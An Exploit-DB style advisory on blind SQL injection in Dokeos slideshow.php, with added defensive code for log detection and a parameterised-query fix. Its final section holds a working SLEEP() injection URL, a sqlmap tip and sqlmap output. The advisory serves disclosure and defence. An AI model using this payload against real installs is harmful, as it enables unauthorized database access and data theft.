Vendor: Dokeos
By: Mormoroth
CVSS: 7.5 (HIGH)
Type: Time-Based Blind SQL Injection
CWE: 89
Product Name: Dokeos
Affected Version From: 2.2.1
Affected Version To: 2.2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:dokeos:dokeos:2.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu
Year: 2016

Dokeos Blind SQL Injection

The 'curdirpath' parameter of the 'slideshow.php' file in Dokeos 2.2.1 is vulnerable to time-based blind SQL injection. An attacker exploits it by sending a crafted payload in the 'curdirpath' parameter that makes the database pause for a chosen interval, for example by calling MySQL's 'SLEEP()' function; because the application returns no query error or data directly, the presence or absence of that delay is what tells the attacker whether an injected condition was true. A tool such as sqlmap automates this and retrieves data from the database one inference at a time.
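The detection side of this description, as an added example that is not part of the advisory or of Dokeos: the script below reads Apache access-log lines, percent-decodes each request's query string, flags parameter values that carry a database delay primitive such as SLEEP(), and correlates that with the recorded response time, so a stalled response to a request carrying a delay call is rated higher than either signal alone. The log format (combined format with %D response time in microseconds appended), the three sample lines, and the 3-second threshold are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format with %D (response time in microseconds) appended.
# The field order is an assumption about the web server's log configuration.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<usec>\d+)$'
)

# Delay primitives an injected condition can use to make the DBMS stall.
# Matched case-insensitively after percent-decoding, tolerating an inline
# comment between the function name and its opening parenthesis.
DELAY_RE = re.compile(
    r'\b(?:sleep|benchmark|pg_sleep|dbms_lock\.sleep)\s*(?:/\*.*?\*/)?\s*\(|waitfor\s+delay',
    re.I,
)

SLOW_THRESHOLD_US = 3_000_000  # 3 s; tune to the endpoint's normal latency

# Constructed sample lines: a normal request, the advisory's SLEEP(5) payload
# (percent-encoded as a client would send it), and a slow but benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jun/2016:22:25:01 +0000] "GET /dokeos-2.1.1/main/document/'
    'slideshow.php?cidReq=123&curdirpath=%2Fimages&slide_id=all HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0" 41233',
    '203.0.113.5 - - [14/Jun/2016:22:25:09 +0000] "GET /dokeos-2.1.1/main/document/'
    'slideshow.php?cidReq=123&curdirpath=%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))Pfag)'
    '%20AND%20%27NFwV%27%3D%27NFwV&slide_id=all HTTP/1.1" 200 5120 "-" "sqlmap/1.0" 5041877',
    '198.51.100.7 - - [14/Jun/2016:22:26:00 +0000] "GET /dokeos-2.1.1/main/document/'
    'slideshow.php?cidReq=123&curdirpath=%2Fimages&slide_id=all HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0" 3900120',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['usec'] = int(rec['usec'])
    parts = urlsplit(rec['url'])
    rec['path'] = parts.path
    rec['params'] = parse_qs(parts.query, keep_blank_values=True)  # percent-decoded
    return rec


def delay_params(params):
    """Names of query parameters whose decoded value contains a delay primitive."""
    return [name for name, values in params.items()
            if any(DELAY_RE.search(v) for v in values)]


def analyse(lines, slow_threshold_us=SLOW_THRESHOLD_US):
    """Return one finding per request that carries a delay primitive or was slow."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = delay_params(rec['params'])
        slow = rec['usec'] >= slow_threshold_us
        if not hits and not slow:
            continue
        if hits and slow:
            severity = 'high'    # injected delay and the server actually stalled
        elif hits:
            severity = 'medium'  # attempt seen, but no measurable delay
        else:
            severity = 'low'     # latency outlier with no payload in the request
        findings.append({'ip': rec['ip'], 'ts': rec['ts'], 'path': rec['path'],
                         'params': hits, 'seconds': rec['usec'] / 1e6,
                         'severity': severity})
    return findings


if __name__ == '__main__':
    for f in analyse(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['seconds']:.2f}s "
              f"{f['path']} params={f['params']}")
```

The pattern list is deliberately short and the payload check runs on the decoded value, so simple URL-encoding does not hide it; a request that triggers only the latency rule is kept at low severity because a slow page on its own is not evidence of injection.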

Mitigation:

Input validation should be applied so that malicious payloads never reach the database query. Additionally, the application should be kept up to date with the latest security patches.
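One way to close the hole described above, as an added example that is not Dokeos's code: a string-built query of the kind that makes a parameter like 'curdirpath' injectable, beside a parameterised version of the same lookup, plus an allow-list check on the directory path applied before the query. It runs against an in-memory SQLite table built for the demonstration, so the table name, columns, rows, and the validation policy are all assumptions; the payload is constructed with the same quote-balancing shape as the advisory's, using OR instead of a SLEEP() call so the effect shows up as returned rows rather than as a delay.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for a document-directory table (constructed, not the Dokeos schema)."""
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE document (id INTEGER PRIMARY KEY, c_id INTEGER, path TEXT, title TEXT)')
    db.executemany('INSERT INTO document (c_id, path, title) VALUES (?, ?, ?)', [
        (123, '/images', 'Course images'),
        (123, '/slides', 'Lecture slides'),
        (456, '/private', 'Another course'),
    ])
    return db


def vulnerable_lookup(db, c_id, curdirpath):
    """Vulnerable pattern: the request value is spliced into the SQL text, so a
    quote inside curdirpath ends the string literal and the rest is parsed as SQL."""
    sql = (f"SELECT id, path, title FROM document "
           f"WHERE c_id = {int(c_id)} AND path = '{curdirpath}'")
    return db.execute(sql).fetchall()


def safe_lookup(db, c_id, curdirpath):
    """Hardened pattern: placeholders are bound by the driver, so the value is
    compared as data and can never change the statement's structure."""
    sql = 'SELECT id, path, title FROM document WHERE c_id = ? AND path = ?'
    return db.execute(sql, (int(c_id), curdirpath)).fetchall()


# Allow-list for a directory path: leading slash, then slash-separated segments
# of letters, digits, underscore or hyphen; no quotes, spaces, or '..'.
# An assumed policy for this example, not Dokeos's own validation.
DIRPATH_RE = re.compile(r'/(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]*')


def validate_curdirpath(value):
    """Second line of defence: reject anything outside the allow-list before it reaches the query."""
    return (isinstance(value, str) and len(value) <= 255
            and DIRPATH_RE.fullmatch(value) is not None)


# Constructed payload: closes the open quote, injects a condition, and reopens a
# quote so the template's trailing quote is balanced, like the advisory's payload.
PAYLOAD = "' OR 'NFwV'='NFwV"

if __name__ == '__main__':
    db = make_db()
    print('vulnerable   :', vulnerable_lookup(db, 123, PAYLOAD))  # every row, even course 456's
    print('parameterised:', safe_lookup(db, 123, PAYLOAD))        # no rows
    print('allow-list   :', validate_curdirpath('/images'), validate_curdirpath(PAYLOAD))
```

Parameter binding is the fix that removes the vulnerability class; the allow-list is defence in depth that also rejects traversal strings such as '/a/../b', which the query alone would happily accept as a literal.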
Source

Exploit-DB raw data:

# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note: hackme.com is a local domain in the lab, not a live website
------
VULNERABILITY
curdirpath in slideshow.php is vulnerable to time-based blind SQL injection
------
POC:

Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note: to exploit with sqlmap you should use the --tamper=between option to retrieve data
------
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database:    'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'

C:\Users\Mort\Desktop\Apps\sqlmap>
------